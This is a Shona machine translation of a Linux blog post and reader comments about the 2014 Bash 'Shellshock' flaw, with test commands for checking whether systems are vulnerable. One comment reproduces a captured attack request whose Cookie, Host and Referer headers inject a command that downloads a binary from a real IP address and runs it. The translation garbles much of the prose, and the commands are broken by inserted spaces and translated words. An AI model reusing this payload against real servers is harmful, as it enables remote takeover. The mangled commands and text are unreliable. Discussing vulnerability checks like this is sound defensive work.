Iyo inomhanya semoto wemusango pane mamwe mablog, chinhu chenhau chakaburitswa mu chengetedzo blog de Red Hat nezve kunetseka kunowanikwa muBhash nekuda kwekushandisa zvisirizvo kwepasi rose. Zvinoenderana nenhau dzekutanga:
"… Kukanganisika kuri nekuda kwekuti misiyano yemamiriro ekunze ane hunhu hwakagadzirwa chaizvo inogona kugadzirwa usati wadana bash shell. Aya misiyano inogona kuve nekodhi inoitwa nekukurumidza panogadzirwa goko. Zita rezviyero zvakatsanangurwa hazvina basa, chete zvirimo. Nekuda kweizvozvo, kusagadzikana uku kunofumurwa mune dzakawanda mamiriro, semuenzaniso:
- ForceCommand inoshandiswa mune sshd masisitimu ekupa mashoma emitemo yekushandisa kugona kune vashandisi vari kure. Uku kukanganisa kunogona kushandiswa kudzivirira izvo uye nekupa zvekupokana kuraira. Mamwe maGit uye Ekumisikidza kumisikidza vanoshandisa yakatemerwa Shells. Kugara uchishandisa OpenSSH hakukanganisike sevashandisi vagara vaine mukana weconsole.
- Iyo Apache server inoshandisa mod_cgi kana mod_cgid inokanganiswa kana zvinyorwa zveCGI zvakanyorwa zvese mu bash, kana kuburitsa sublevels. Maslevelvel akadaro anoshandiswa zvachose nehurongwa / popen muC, na os.system / os.popen muPython, kana uchishandisa system / exec shell muPHP (kana ichimhanya muCGI modhi), uye yakavhurika / system muPerl (zvinoenderana netambo yekuraira).
- PHP zvinyorwa zvinomhanya ne mod_php hazvibatike kunyangwe ma sublevels akatambwa.
- Vatengi veDHCP vanokumbira zvinyorwa zvegobol kuti zvigadzirise iyo system, nemitengo inotorwa kubva kuseva inogona kutyisa Izvi zvinobvumidza mirairo yekumanikidza kuitiswa, kazhinji semidzi, pane DHCP mutengi muchina.
- Madhimoni akasiyana siyana nezvirongwa zvine mukana weSUID zvinogona kuendesa zvinyorwa zvegobolondo pamwe nemagadzirirwo emamiriro ezvinhu akaiswa / akafuridzirwa nemushandisi, izvo zvaizobvumidza mirairo yekumanikidza kuitiswa.
- Chero chipi zvacho chishandiso chinokochekera kugobhu kana chinomhanya cheShell script senge kushandisa bash semuturikiri. Zvinyorwa zveShell izvo zvisingabudise zvinoshandiswa hazvisi panjodzi yedambudziko iri, kunyangwe zvikagadzirisa zvisina kuvimbika zvemukati uye ndokuzvichengetera Shell variables (kuruboshwe) uye sublevels yakavhurika.
... "
Ungaziva sei kana Bhash rangu rakakanganiswa?
Tichifunga izvi, pane nzira yakapusa yekuziva kana isu takakanganiswa nenjodzi iyi. Muchokwadi, ini ndakaedza paAntergos yangu uye sezviri pachena handina kana dambudziko. Izvo isu zvatinofanirwa kuita kuvhura terminal uye kuisa:
env x = '() {:;}; echo pangozi 'bash -c "echo uyu bvunzo"
Kana zvikabuda nenzira iyi hatina dambudziko:
env x = '() {:;}; echo pangozi 'bash -c "echo uyu muyedzo" bash: yambiro: x: kushaya hanya nedudziro yebasa kuyedza bash: kukanganisa kupinza basa tsananguro ye` x' uyu bvunzo
Kana mhedzisiro yacho yakati siyanei, ungangoda kushandisa iwo maratidziro ematanho ezvedu zvakasarudzika zvekugovera kuti uone kana vatoshandisa chikwangwani. Saka unoziva 😉
Yakavandudzwa: Ichi ndicho chinobuda kubva kune waunoshanda naye achishandisa Ubuntu 14:04:
env x = '() {:;}; echo pangozi 'bash -c "echo uyu bvunzo" pangozi uyu muedzo
Sezvauri kuona, kusvika parizvino iri panjodzi.
Ndine Kubuntu 14.04 kubva pa64 uye ini ndinowanawo:
env x = '() {:;}; echo pangozi 'bash -c "echo uyu bvunzo"
kunetsa
uyu muyedzo
Ini ndatovandudza, asi hazvigadzirise. Zvekuita?
Mirira ivo kuti vagadzirise. Yatove eOS semuenzaniso yakagadziridzwa .. 😀
Zvinoshamisa sei, ini zvakare ndine Kubuntu 14.04
$ env x = '() {:;}; echo pangozi 'bash -c "echo uyu bvunzo"
bash: yambiro: x: kufuratira basa tsananguro kuyedza
bash: kukanganisa kupinza basa tsananguro ye` x '
uyu muyedzo
Ini ndinowedzera kuti iyo vhezheni ye "bash" package yaive yatorwa pasi nhasi ndeiyi:
4.3-7ubuntu1.1
http://packages.ubuntu.com/trusty/bash
Mune yangu nyaya, ndichipa iwo murairo, zvinongondipa zvinotevera mune terminal:
>Zvisinei, joke nderekuti ndakagadzirisa Debian Wheezy uye ndizvo zvakandirasa.
Wheezy ichiri panjodzi yechikamu chechipiri chebug, zvirinani kwemasikati (UTC -4: 30) dambudziko rakanga richiri kutevera: /
Ini ndango simbisa kuti mushure mekushandisa yekuvandudza mangwanani ano kana Slackware kana Debian kana Centos hazvibatike sezvavanogamuchira inoenderana inoenderana.
Chii chinoita kuti Ubuntu irambe ichinetseka paawa ino? Uye mundiudze zvakachengeteka: D.
Asi wakamboedza kugadzirisa Ubuntu?
Nedudziro yanhasi ivo vakagadzirisawo.
OK
Nyanzvi dzekuchengetedzwa dzinoyambira nezve 'Bhash' kushomeka, zvinogona kuisa kutyisidzira kukuru kune vashandisi veLinux Software kupfuura iyo Heartbleed bug, uko vateki vanogona kushandisa bug muBhash kuti vatore kutonga kuzere kwesisitimu.
Tod Beardsley, manejimendi maneja wecybersecurity firm Rapid7, akayambira kuti kukanganisa kwakakosheswa gumi nekuda kwekuomarara kwayo, zvichireva kuti ine simba rakanyanya, uye yakayerwa "yakaderera" nekuda kwekuoma kwekushandisa, zvichireva izvo zviri nyore kurwisa kwe'hacker '. Nekushandisa kushomeka uku, varwisi vanogona kutora maitiro ehurongwa, kuwana ruzivo rwakavanzika, kuita shanduko, nezvimwe, ”akadaro Beardsley. "Chero ani ane masystem anogara Bhash anofanira kunyorera chigamba ipapo ipapo," akawedzera.
PASI PENYAYA DZINOITIKA IYO INOPARADZA CHITANGO CHEKARE (GNU) uko kunochengeterwa Bach, zvingave zviri nyore kuti Linux Software ibvise GNU uye shanduko yeiyo BSD chishandiso.
PS: usachenesa rusununguko rwangu rwekutaura, ... usatuka chero munhu, ... usadzime meseji yangu senge yapfuura meseji yandakadzima!.
Ah ndapota, usanyanya kudarika. Ndinovenga sei vanhu avo vanoshandisa BSD uye vanozvidza GNU, Linux kana chero chinhu kubva kumabasa aya.
Ndinewe uye unonyatsotaura pamusoro pekuoma kwegomba iri.
Yakanga isiri yekudzvinyirira, yaive redundancy (iwe waive wataura zvakafanana mune iyo gnome 3.14 post)
«… Uye yakatemwa 'ZVAKADZOKA' KUNE KUKWANISIKA kwekushandisa, izvo zvinoreva kuti zviri nyore pakurwisa kwevavengi"
Izvo zvisingaiti zvinoonekwa here?
Zvingaitwe sei nyore kushandisa kusagadzikana uye panguva imwe chete iine "yakaderera" nhanho yenjodzi nekuti yakaoma kushandisa?
Iyo idhigi yakagadziriswa mukati memaawa ekuzivana uye kuti, sekushungurudzika, haina mishumo yekushandiswa (Ehe, izvi zvine nguva shoma yekuzivana).
Iyo yakawanda tabloid yekudhinda pane chaiyo njodzi.
@Vashandi vanoita kunge vasina kukosha kwauri here? Chii chauchandiudza izvozvi?
GET./.HTTP/1.0
.User-Agent: .Thanks-Rob
.Kuki: (). {.:;.};. Wget.-O./tmp/besh.http://162.253.66.76/nginx; .chmod.777. / tmp / besh; ./ tmp / besh;
.Host: (). {.:;.};. Wget.-O./tmp/besh.http://162.253.66.76/nginx; .chmod.777. / tmp / besh; ./ tmp / besh;
.Referer: (). {.:;.};. Wget.-O./tmp/besh.http://162.253.66.76/nginx; .chmod.777. / tmp / besh; ./ tmp / besh;
Bvuma:. * / *
$ faira nginx
nginx: ELF 32-bit LSB inoitiswa, Intel 80386, vhezheni 1 (SYSV), inoratidzirwa yakabatana, yeGNU / Linux 2.6.18, yakabviswa
$md5sum nginx
5924bcc045bb7039f55c6ce29234e29a nginx
$sha256sum nginx
73b0d95541c84965fa42c3e257bb349957b3be626dec9d55efcc6ebcba6fa489 nginx
Unoziva here kuti chii? Pasina ngozi zvishoma ...
Mamiriro acho akakomba, asi kubva ipapo kutaura kuti iwe unofanirwa kumira kushandisa bash yeiyo BSD sarudzo, yatove yakawanda, zvakadaro iyo yekuvandudza yatovepo, ini ndinongobata kugadzirisa uye hapana chimwe chinhu.
Iye zvino PD, ndinofunga inonyanya kushanda @robet, handifunge kuti pano maAdmin vakazvipira kudzima makomendi akadai nekuti hongu, nekuti, kubva zvandakaita munharaunda ino ndainzwa uye ndinovimba zvinoramba zvakadaro.
Thanks.
Iwe unoisa chaiyo yakafanana chirevo pane maviri akasiyana mitsara. Kana iwe uri kuyedza kusimudzira "sosi" yenyaya, ndine hurombo, ino haisi iyo nzvimbo.
Bash inouya kubva kuUnix (uye yayo GNU dombo). BSD-yakavakirwa masisitimu senge OSX anokanganiswawo, uye sekureva kwaGenbeta, haasati aibata. Saizvozvo, kuti uwane Bhash iwe unoda account yemushandisi, ingave yemuno kana kuburikidza neSSH.
@Vashandi:
1.- Inotaridzwa seNhanho 10 (yakanyanya mwero wenjodzi) nekuda kweiyo huwandu hweshumiro dzinogona kukanganiswa nedhijitari. Mutsamba huru vanoita kuti chokwadi ichocho chive chakajeka, vachipokana kuti iyo bug inogona kukanganisa masevhisi akadai seapache, sshd, zvirongwa zvine mvumo yekuzvibata (xorg, pakati pevamwe).
2.- Inotorwa seYakadzika Chikamu cheDambudziko, kana zvasvika pakuitwa kwayo, uye muenzaniso wakanakisa weiyi kushupika bvunzo script iyo @elav yakaisa muchipositi. Zvakaoma kwazvo kuita hazvisi, sezvauri kuona.
Ini handioni redundancy mune iyo ruzivo (ini ndinongoona dudziro yeGoogle) uye kana dambudziko iri rakakomba, uye sekutaura kwako, rinotova nechigamba uye mhinduro, asi kwete izvo, haisisiri njodzi, uye chaicho chaicho .
@petercheco / @Yukiteru
Usandidudzira zvisizvo, ndinofunga zviri pachena kuti kushoropodza kwangu inyaya yekuti Robet inobatanidza uye yakanangana nekusazvibata uye kwete redundancy.
Nenzira imwecheteyo, isu tinofanirwa kusiyanisa pakati penjodzi nenjodzi (ini handitaure zvekupedzisira), isu tinowanzozvishandisa semazwi anoreva zvakafanana, asi pano, njodzi ingangove kukuvara kwembug uye njodzi yekuitika kwayo.
Mune yangu chaiyo kesi, ini ndakapinda kubva nezuro. Izvo zvaive zvisiri zvekutumira zvinyorwa kana chero chinhu chakadai. Ndakatora foni ndikatumira message ku sysadmin ine link iyi ndikasimbisa kuti ndaive nezvose zvine zvigamba, ndokumbira mundiregerere asi idzi nhau hadziite kuti ndirambe ndakamuka.
Mune mamwe maforamu vanotaura nezve kushomeka kweBash, "mhinduro yakaburitswa naDebian naUbuntu", asi nhasi vaona kuti kunetseka kuchiripo, saka mhinduro yacho yanga isina kukwana, vanotaura izvozvo!
Ndinoona kuti vazhinji vandishora nekuda kweyakareruka chokwadi chekudzivirira vanhu kubva pakukutu kwekushupika - vanokwanisirwa padanho regumi rekukuvadza kwakanyanya, uye vachitaura mhinduro dzinogona kuitika kuLinux Software pamberi pechishandiswa cheGNU yechinyakare uko Bhash inotambirwa -izvo zvakakwana GNU inogona kutsiviwa neiyo BSD chishandiso muLinux Software,… ini ndinoshandisa zvakare Linux uye ndinoda Linux!
Ini ndinojekesa kuti Bhash haina kuuya nekumisikidza yakaiswa muBSD, ndeimwezve Linux inoenderana package iyo inogona kuiswa muBSD ... ehe!. Uye sosi inoiswa kuitira kuti vatarise nhau, sezvo vazhinji vevashandisi dzimwe nguva vasingatendi meseji kana kutaura.
robhoti: Sezvo ivo vakatokuudza iwe kasingaperi, iwe watoisa yako yekutaura nenhau munyore, haufanirwe kuzviisa mune ese posvo iwe yaunopindura.
Pa bash, pane mamwe makobvu anogona kushandiswa kana Bhash iri munjodzi. 😉
Robhoti, iyo yandinoziva hapana software inosanganisa linux kernel neBSD userland. Chinhu chepedyo ndeimwe nzira yakatenderedza, kBSD + GNU, sezvinoitwa naGentoo naDebian. Kunze kwezvo, GNU (1983) haigone kunzi "yechinyakare" kana iri mushure meBSD (1977). Ivo vaviri vanogovana yavo unix midzi (asi kwete iyo kodhi), paisazove ne "Linux kuenderana" kana Bhash rakagadzirwa apo Linus T achiri mwana.
uff, debian kuyedzwa panguva ino "kunetsekana" chakadii isu ...
Ini ndinoshandisa Debian Kuyedza uye kunyangwe mubazi rino takagamuchira iyo bash yekuvandudza
zvinoenderana negenbeta kune imwezve njodzi
http://seclists.org/oss-sec/2014/q3/685
iwo murairo wekubvunza ndi
env X = '() {(a) => \' sh -c "echo vanotambura"; bash -c "echo Kukundikana 2 isina kunyorwa"
env X = '() {(a) => \' sh -c "echo vanotambura"; bash -c "echo Kusina kunyorwa Kukundikana 2" sh: X: mutsara 1: syntactic kukanganisa padhuze nechisingatarisirwi `= 'sh: X: mutsara 1:`' 'sh: kukanganisa kupinza basa tsananguro ye` X' sh - Inotambura - Kukundikana 2 isina kukamurwa kuraira hakuna kuwanikwazvimwe chete neni.
Kunyange pano. Asi iyo yekutanga bug mune iyo positi yakanga yakabatidzwa mu (L) Ubuntu 14.04
Panzvimbo pekuita iri nyore edhiyo kuyedza kuite rairo inoda maropafadzo, ini ndinokanda "mikana isina kukwana" ... iyi bug haina kukwidziridza ropafadzo?
Warevesa !! ivo vaive vaviri kukuvadzwa ...
Kwandiri muLinux Mint 17 mushure meyechipiri bash yekuvandudza iyo yavakaisa mumabhuku eUbuntu nezuro husiku, kana uchiita iwo wekuraira iro shell rinopa ichi chabuda:
env X = '() {(a) => \' sh -c "echo vanotambura"; bash -c "echo Yakundikana 2 isina kunyorwa"
>
Iyo vhezheni ye "bassh" iyo yakaiswa muUbuntu repositories kugadzirisa izvo zvakapfuura ndeiyi:
4.3-7ubuntu1.2
Pane masisitimu akatorwa naDebian unogona kutarisa iyo yakaiswa vhezheni neiyi murairo:
dpkg -s bash | grep Shanduro
Zvisinei, inofanira kujekeswa, zvirinani kune vashandisi veDebian, Ubuntu uye Mint; Iwe haufanire kunetseka zvakanyanya pamusoro pezvirongwa zvinomhanya zvinyorwa ne #! / Bin / sh musoro nekuti pane izvo zvinogoverwa / bin / sh haina kudaidza "bash", asi inosunga kune iyo shell "dash" (dash ndeye :)
Iyo Debian Alchemist Console (dash) yakatorwa POSIX koni
yemadota.
.
Sezvo ichigadzira zvinyorwa nekukurumidza kupfuura bash, uye iine mashoma ekutsamira
maraibhurari (ichiita kuti iwedzere kusimba pakundikana kwesoftware kana
Hardware), inoshandiswa seye default system koni pane masystem
Debian.
Saka, zvirinani muUbuntu, "bash" inoshandiswa sehombodo yemushandisi yekupinda (zvakare yeiyo mudzi mushandisi). Asi chero mushandisi anogona kushandisa imwe Shell nekusarudzika kwemushandisi uye midzi midziyo (zviteshi).
Zviri nyore kutarisa kuti goko rinoita zvinyorwa (#! / Bin / sh) nekuita iyi mirairo:
faira / bin / sh
(iyo inoburitsa iri / bin / sh: yekufananidza chinongedzo ku `dash ') isu tinoteedzera trace yekudzokorora iwo murairo
faira / bin / dash
(zvinoburitswa iri / bin / dash: ELF 64-bit LSB yakagovaniswa chinhu, x86-64, vhezheni 1 (SYSV) saka ichi ndicho chinogoneka.
Iyi ndiyo mhedzisiro pane kugoverwa kweLinux Mint 17. Pane zvimwe zvisiri zveUbuntu / Debian-zvakavakirwa vanogona kunge vakasiyana.
Izvo hazvina kuoma kushandura default shell !! iwe unogona kunyange kushandisa rakasiyana revashandisi uye remudzidzi mushandisi. Chaizvoizvo iwe unongofanirwa kuisa iyo shell yesarudzo yako uye nekushandura iyo default neiyo "chsh" yekuraira kana nekugadzirisa iyo / etc / passwd faira (kunyange vashandisi vasingazive mhedzisiro yekukanganisa kana uchigadzirisa iyo "passwd" faira, iri Zvirinani kuti vazvizivise ivo pachavo zvakanaka kwazvo uye vasati vazvigadzirise, gadzira kopi yeiyo yekutanga kuitira kana zvichidikanwa kuti uwanezve).
Ini ndinonzwa kusununguka ne "tcsh" (tcsh iri :)
Iyo TENEX C koni, yakagadziridzwa vhezheni yeBerkeley csh
"Csh" ndizvo zvakashandiswa naMac OS X makore mashoma apfuura. Chinhu chine musoro kufunga nezve yakawanda yeApple's operating system ndeye FreeBSD kodhi. Zvino kubva pane zvandakaverenga nezuro, zvinoita sekunge ivo zvakare vanopa "bash" kumatunhu ekushandisa.
Mhedziso:
- Yakabvarurwa "bash" shanduro "yezvakashandiswa zvakanyanya kugovera" zvakatogoverwa
- "bash" vhezheni 4.3-7ubuntu1.2 uye gare gare haina izvi zviputi
- Hazvisungirwe kushandisa "bash" muOS * Linux
- Mashoma * Linux migove link #! / Bin / sh na "bash"
- Kune dzimwe nzira: dota, dash, csh, tcsh uye zvimwezve
- Izvo hazvina kuomarara kushandura default girobhu iyo inoshevedzwa nesisitimu kana ichivhura terminal
- Mashoma mashoma madhizaini (ma routers nevamwe) anoshandisa "bash", nekuti ihombe kwazvo !!
Parizvino kumwe kuvandudzwa kuchangosvika kunoisa imwe vhezheni ye "bash" 4.3-7ubuntu1.3
YeLinux Mint 17 uye Ubuntu 14.04.1 LTS
ArchLinux yakapinda vhezheni bash-4.3.026-1
@ Xurxo… .csh kubva kuBerkeley?,… Iwe unonzwisisa chimwe chinhu cheizvo ini zvandinotaura pamusoro, uye zvirinani kushandisa BSD "csh"… pane chishandiso cheGNU chakare uko kunogarwa Bhash. Icho chishandiso ndicho chakanakira Linux Software.
Ini ndinofungidzira ichi ndicho chikonye
https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=762760
ichokwadi?
Uye ingava mhinduro yei?
Mirira ivo kuti vavandudze pasuru pane yako distro 😉
Iyo bhagi yakabhabhatidzirwa se shellshock
http://www.theregister.co.uk/2014/09/24/bash_shell_vuln/
kunetsa
uyu muyedzo
Hakuna chigamba cheUbuntu Studio 14.04
Yakagadziridzwa muUbuntu Studio 14.04.1
wisp @ ubuntustudio: ~ $ env x = '() {:;}; echo pangozi 'bash -c "echo uyu bvunzo"
bash: yambiro: x: kufuratira basa tsananguro kuyedza
bash: kukanganisa kupinza basa tsananguro ye` x '
uyu muyedzo
Chaizvoizvo kunetsekana kudiki, kana kuchikukanganisa, ndechekuti iwe wanga uchikanganisa zvisati zvaitika ...
Nekuti bash script inomhanya ine midzi yerombo haifanire kufumurwa kune mushandisi. Uye kana akamhanya asina rombo rakanaka, hapana humhondi hwakadaro. Chaizvoizvo, hazvina musoro. Zvakawanda zvinotyisa.
Ini ndinofunga zvakafanana.
Chaizvoizvo, kutengesa mamwe mapepanhau kana kuwana kushanya kwakawanda, izvi zvipukanana zvakanaka.
Asi ivo vanogara vachikanganwa kutaura kuti kuti ukanganise komputa nerudzi urwu rwezvinyorwa, iwe unofanirwa kutanga wawana mukana we bash uye wozove nawo semidzi.
vashandi kana iwe ukashandisa apache ine cgi ingoisa mumusoro we http semakuki kana referer basa raunoda kuita. Yakatoshandiswa kuparadzira makonye.
uye kana mumwe munhu akaisa goko kuseva ine wget mishell.php, mune iyo kesi haina kushata, handizvo?
Bvumirana newe. Ini ndaifunga kuti yaive bhuru hombe senge iri muHeartbleed (kunyangwe iyo NSA yakazvikweretesa kuti iwedzere kuda kuziva), asi mushure mezvose yaive diki bhudhi.
Kune mamwe mabhugi akakomba senge kupenga kweFlash uye kudzikira mukuita muPepper Flash Player, uye iyo yakatogadziriswa webRTC bug muChannel uye Firefox.
Iwe unoziva kana iine hurongwa hwevanhu vane Linux Mint 16?
Mukuyedza kwaDebian yaive yatogadziriswa.
Mune angu mashanu distros inogadziriswa, mune yangu OS X handizive.
Ndokumbirawo usarore chirevo changu, ndati OS X. Handizive kana uchigona kuti OS X pane ino saiti.
@yoyo zvakanaka usaiburitse zvakanyanya kuti vachiri kushanda pane zvimwe zvimedu zvechigamba ... edza izvi wozondiudza, famba XD
env x = '() {:;}; echo pangozi 'bash -c "echo Ini ndakanyanya kutambura kupfuura iphone 6 marara"
Kuti kana vakazvigadzirisa 100% pamberi peOS X ini ndakatengesa chero chinhu
Zvakanaka, kunyangwe muAss Technica ivo vanopa kukosha kweBash muOSX.
@Yoyo inotevera comment paOS X yeSPAM .. lla tu save .. 😛
@yoyo iripo kugadzirisa zvirevo ... asi zvimwe zvese unozviziva 😉
FSF yataura
https://fsf.org/news/free-software-foundation-statement-on-the-gnu-bash-shellshock-vulnerability
Senge ivo vava kuita patenzi neOSX (nekuti OSX ichiri kushandisa Bash: v).
Zvisinei, ini handifanire kukanganisa naDebian Jessie zvakanyanya.
Kana iyo sisitimu iri panjodzi paCent OS:
yum chenesa zvese && yum kugadzirisa bash
kuti uone iyo bash vhezheni:
rpm -qa | grep bash
Kana iyo vhezheni iri yapfuura pane bash-4.1.2-15.el6_5.1 yako system inogona kuve iri nyore!
Thanks.
2nd kudzvinyirirwa kusati kwagadziriswa
env inoshanduka2 = '() {(a) => \' sh -c "echo isingatenderwi"; bash -c "echo Kukundikana 2 isina kunyorwa"
Kugadziridza ...
Izvo zvinopesana zvinoitika kwandiri muGentoo, ini ndinongotadza kukundikana kwekutanga asi neyechipiri ini ndinowana izvi:
[kodhi] sh: X: mutsara 1: syntactic kukanganisa padhuze nechisingatarisirwi `= '
sh: X: mutsara 1: ''
sh: kukanganisa kupinza basa tsananguro ye` X '
sh: vanotambura: raira harina kuwanikwa
Bug 2 haina patched
[/ kodhi]
Ini handizive kana paizove neyakagadzikana vhezheni yeBhash nemabhugi akagadziriswa, asi chero nzira ichave yakamirira kwenguva inotevera pandichaita kubuda - sncnc && kubuda -update -deep -with-bdeps = uye -newuse @world (ndozvinoita nhanho ini ndinogadziridza iyo sisitimu yese).
Ndine Gentoo ine vhezheni 4.2_p50 uye kusvika zvino yapfuura bvunzo dzese. Edza kubuda –sync wobva wabuda -av1 app-shells / bash, uyezve tarisa kuti une vhezheni 4.2_p50 uchishandisa iyo bash -version rairo.
Wakamboedza izvi here?
Uye nemapakeji nyowani, bvunzo nyowani iyo Red Hat inotipa
cd / tmp; rm -f / tmp / echo; env 'x = () {(a) => \' bash -c "echo zuva"; kati / tmp / echo
Kana yedu system isinganetseki uye yakave yakarongedzwa nenzira kwayo, inofanira kutipa chimwe chinhu chakadai
1 zuva
2 kati: / tmp / echo: Iyo faira kana dhairekitori haipo
Edza nenzira iyi:
env X = '() {(a) => \' sh -c "echo vanotambura"; bash -c "echo Kukundikana 2 patched"
ndinotora
kunetsa
Bug 2 zvigamba.
Kanganwa nezvayo, mutsetse wakarongeka zvakashata
Zvakanaka! Ini ndatoita iyo gadziriso pane yangu Slackware, ndatenda!
Mhoroi, mubvunzo unomuka, ndine maseva akati wandei ane "SUSE Linux Enterprise Server 10" 64-bit.
Pandinoita mirairo ini ndisinganetsi, ndinonyanya kutambura kupfuura marara ari iPhone 6 xD
Kana ndisina kukanganisa kugadzirisa / kuisa mapakeji muSUSE zvinoitwa nemurairo «zypper».
Pane mamwe maseva zvinondiudza izvi:
CHINOKOSHA: ~ # zypper kumusoro
-bash: zypper: raira haina kuwanikwa
ZVINOKOSHA: ~ #
Uye mune vamwe izvi:
SMB: ~ # zypper kumusoro
Kudzorera masosi esisitimu…
Kubata metadata yeSUSE Linux Enterprise Server 10 SP2-20100319-161944…
Kubvisa RPM dhatabhesi ...
Summary:
Hapana zvekuita.
Zvandinoita?
Ndinoziva kuti vamwe vanoti kusagadzikana kushoma pane kwezvavanopenda asi ndinayo uye handidi kuburitswa munjodzi, ingave diki kana hombe.
Thanks.
Husiku hwakanaka, ini ndaedza kunamatira kodhi iwe yawakapa muchinyorwa, ini ndinowana izvi
sanders @ pc-sanders: ~ $ env x = '() {:;}; echo pangozi 'bash -c "echo uyu bvunzo"
uyu muyedzo
sanders @ pc-sanders: ~ $
Ndokumbirawo munditsanangurire nzira yekumaka iyo distro, ini ndinogadziridza zuva nezuva uye ini handione shanduko mune zvinobuda zvekukurumidza.
Ndinokutendai zvikuru!